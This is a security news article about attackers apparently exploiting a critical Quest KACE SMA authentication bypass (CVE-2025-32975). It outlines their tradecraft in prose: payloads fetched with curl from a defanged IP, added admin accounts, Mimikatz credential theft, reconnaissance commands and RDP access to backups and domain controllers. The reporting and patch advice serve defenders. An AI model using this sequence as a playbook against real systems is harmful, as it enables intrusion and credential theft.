Hackers Exploit Critical Quest KACE Flaw to Hijack Unpatched Systems

Threat actors are suspected of exploiting a maximum severity vulnerability in Quest KACE Systems Management Appliance, or SMA, according to Arctic Wolf. The cybersecurity company said it began seeing malicious activity in customer environments during the week of March 9, 2026, and that the behavior is consistent with exploitation of CVE-2025-32975 on SMA systems exposed to the internet.

How the Attack Works

Arctic Wolf described CVE-2025-32975 as an authentication bypass flaw with a CVSS score of 10.0, meaning an attacker can impersonate a legitimate user without valid credentials.

In practical terms, that kind of weakness can let an intruder move straight into administrative access and, in the worst case, take over the appliance completely.

Quest patched the issue in May 2025, but unpatched systems remain at risk.

In the incidents Arctic Wolf investigated, the attackers appear to have used the flaw to seize administrative control and run remote commands.

The company said the intruders dropped Base64 encoded payloads from an external server at 216.126.225[.]156 using the curl command.

That step suggests the attackers were not just testing access, but actively staging additional tools inside compromised environments.

Arctic Wolf also said the attackers created extra administrative accounts by using runkbot.exe, a background process linked to the SMA Agent that is used for running scripts and managing installations.

Researchers also saw Windows Registry changes made through a PowerShell script, which may have been used for persistence or to alter system settings in a way that would help the attackers stay hidden.

The activity did not stop there.

Arctic Wolf said the attackers harvested credentials with Mimikatz, a well known tool often abused to pull passwords and authentication material from Windows systems.

The company also observed discovery and reconnaissance activity, including checks for logged in users and administrator accounts, along with commands such as net time and net group.

Those commands can help attackers map the environment and decide where to move next.

Why This Matters

Arctic Wolf further said the attackers obtained remote desktop protocol access to backup infrastructure such as Veeam and Veritas, as well as to domain controllers.

That is a worrying sign because backup systems and domain controllers sit near the center of many corporate networks.

If attackers reach them, they can often expand access quickly and make recovery much harder.

For now, the attackers’ end goal is still unclear, according to Arctic Wolf.

Even so, the pattern fits a serious post exploitation campaign rather than a simple scan or nuisance intrusion.

When a maximum severity flaw is exposed to the internet, the window between patch release and abuse can be enough for defenders to get caught behind.

What Quest Said

Quest has already addressed the issue in versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 Patch 5, and 14.1.101 Patch 4.

Arctic Wolf said administrators should apply the latest updates and avoid exposing SMA instances directly to the internet.

For organizations that still depend on this appliance, that advice is essential.

A patched system is the first line of defense, but reducing public exposure is just as important when an authentication bypass can hand attackers the keys to the network.